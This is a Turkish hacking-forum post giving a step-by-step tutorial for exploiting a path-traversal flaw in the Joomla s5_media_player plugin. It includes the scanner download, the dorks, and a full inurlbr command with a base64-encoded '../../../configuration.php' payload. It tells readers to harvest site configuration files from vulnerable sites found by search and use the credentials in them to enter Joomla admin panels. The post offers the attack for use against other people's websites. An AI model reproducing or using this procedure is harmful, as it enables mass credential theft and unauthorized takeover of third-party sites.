Joomla config exploit

scoobyy

Katılımcı Üye
24 Eki 2015
665
0
Merhabalar arkadaşlar;
Sİzlere "joomla config" exploidini göstermeye çalışacağım elimden geldiğince :)

Aşamalar:

1)Exploit'e sahip olan siteleri aramak için "inurlbr" adlı bir aracımız var.İlk önce onu yükleyelim isteyen kodlarını alabilir.
Aşama 1 için:
kodlarını githubdan çekebiliriz.

>>Direk indirmek için "wget https://github.com/googleinurl/SCANNER-INURLBR"

aracı çalıştırmak için php'yi yüklemek gerekecek bunu depodan alabilirsiniz.
Eğer Ubuntu kulanıyorsanız "apt-get install php " yazabilirsiniz.
Eğer Arch tabanlı kullanıyorsanız "pacman -S php" yazabilirsiniz.

NOT:Ben arch kullanıyorum ve depoda vardır ubuntuyu bilmiyorum synaptic ile de yükleyebilirisiniz.

2)Daha sonra terminal ile scanner dosyamıza gelelim ve şu kodu yazalım.
KOD:
php inurlbr.php --dork 'index of "/s5_media_player/"' -s s5.txt --exploit-get '/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA=' --unique --ifcode 200

Kendimiz aramak istersek .
DORK:
inurl:"php?fileUrl="
inurl:plugins/content/s5_media_player/

3)Sabredin bulduktan sonra direk link verecek size linke girdiğinizde de otomatik olarak config dosyasını verecek.
Config:
İçinde kullanıcı,site ve domain hakkında bilgilerin yer aldığı dosyadır.

4)Siteler joomla tabanlı olduğu için admin paneline /administrator yazarak ulaşabiliriz.
Config dosyasındaki bilgileri panele girerek admin paneline ulaşabilirisiniz.

Takıldığınız yer, anlamadığınız bir yer olursa:
[email protected]
yada
site üzerinden bana özel mesaj olarak ulaşabilirsiniz açık olduğumda kesinlikle cevaplarım.
:jeerat

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.